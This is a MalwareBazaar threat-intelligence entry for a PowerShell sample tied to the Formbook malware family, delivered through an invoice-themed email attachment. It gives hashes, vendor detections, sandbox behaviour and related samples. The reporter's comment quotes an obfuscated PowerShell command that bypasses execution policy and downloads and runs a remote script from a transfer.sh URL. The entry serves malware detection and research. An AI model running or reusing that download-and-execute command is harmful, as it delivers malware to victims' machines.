MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11
SHA3-384 hash: 928e02c01732f7d31a4aadd625cfbfe5f3a8be77a2e68ca037584494d9ea55d2514ac735048ce2bab70e0f223fbe5d4a
SHA1 hash: d16de10e43cf8f07be14d13599a459fc3f9a83c7
MD5 hash: 1623e62971b6cbe70bf5dc56198ab4b6
humanhash: gee-september-oven-purple
File name:transfer.sh_get_9GqmOG_jramooooss.ps1
Download: download sample
Signature Formbook
Create hunting rule
File size:2'273 bytes
First seen:2022-04-03 12:06:58 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 48:tmq1543FrMYF3gNZE+KbyN1r60NkwKzwvHWuc7:tTorT4/lN1r9NTiyHrC
Threatray 531 similar samples on MalwareBazaar
TLSH T1F841D9DCD28F3894E2D88725E778BCCB954569ED3BE30341C70AA8041472987A9BE42D
Reporter c_APT_ure
Tags:exe powershell ps1 vbs


Avatar
c_APT_ure
--- mail attachments (spaces replaced with [_X]) ---
49e864fe28310b2adc782a975aaa5b67 ./Revised_Invoice_#03252022.iso
e0e7f44f32d0b3dabb08bd61a3b81f6a ./Revised_Invoice_#03252022.vbs

--- processes created ---
* pid="2660" / md5="979D74799EA6C8B8167869A68DF5204A" / parentpid="1452"
path="C:\Windows\System32\wscript.exe" / cmdline="C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Revised_Invoice_x2303252022.vbs'"
* pid="2688" / md5="92F44E405DB16AC55D97E3BFE3B132FA" / parentpid="2660"
path="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" / cmdline="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -exeCutiO BYpASS -C I`eX(n`EW-Ob`J`EcT nET`.weBCLi`ENt).DoWnloAdStRiNG('https://transfer.sh/get/9GqmOG/jramooooss.ps1') "

Intelligence

File Origin
# of uploads :
1
# of downloads :
530
Origin country :
n/a
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.PSH.Agent.EP.9496.16159.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
powershell powershell
Link:
https://www.filescan.io/uploads/62498de69253b276b7d825a0/reports/f0bea80a-7718-41b5-9cec-28b16b24d37f/overview
Result
Verdict:
MALICIOUS
Details
Base64 Encoded URL
Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11/
Threat name:
Script-PowerShell.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2022-03-25 19:26:19 UTC
File Type:
Text (PowerShell)
AV detection:
7 of 42 (16.67%)
Threat level:
  2/5
Verdict:
malicious
Similar samples:
069a5bceddda349a9098d3a754993c6ac51b44f1a24e096673738af09fa97f5e
Formbook
2054aea7c02d7fe0631a126588030445b14af83428eb213d719400d6b80acde3
Formbook
34bebb0936e153711639007269f14bc1d49c46963b3b9f322fedd9cd9d802ea1
Formbook
3d98af517d49b15dba615482257fd8a72f8810b0d4f18a47fce8bf06b3372fa9
Formbook
61958a4fe3c96c015cd835174e8eca1c369cf5f34add7e3f3aedde342239f8bb
Formbook
7124c24696267ab4ce59e7ee22721709f1141f03b75650a8b820c66840ac69ff
Formbook
c96acfa4cc46b1034b01d464fcca95be8143a7219f32b9fcf3800f04f690372a
Formbook
f68fa6b1bbbc7654157a918b34bb633c008a0e8f9cf608e763ddade76c543791
Formbook
+ 521 additional samples on MalwareBazaar
Result
Malware family:
n/a
Score:
  8/10
Tags:
n/a
Link:
https://tria.ge/reports/220403-paandaegar/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Blocklisted process makes network request
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.95
Link:
https://yomi.yoroi.company/submissions/389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Formbook

PowerShell (PS) ps1 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11

(this sample)

Formbook

Executable exe 3b8a5b17925c115df3673e81b408684a6199b9dc6e715810a43444d297c5089d

  
URLhaus
https://urlhaus.abuse.ch/url/2115295/
  
Dropping
MD5 51c7f45ca2d7d26be5e7d6b51aec8e0a
  
Delivery method
Distributed via e-mail attachment
  
Dropping
SHA256 3b8a5b17925c115df3673e81b408684a6199b9dc6e715810a43444d297c5089d

Comments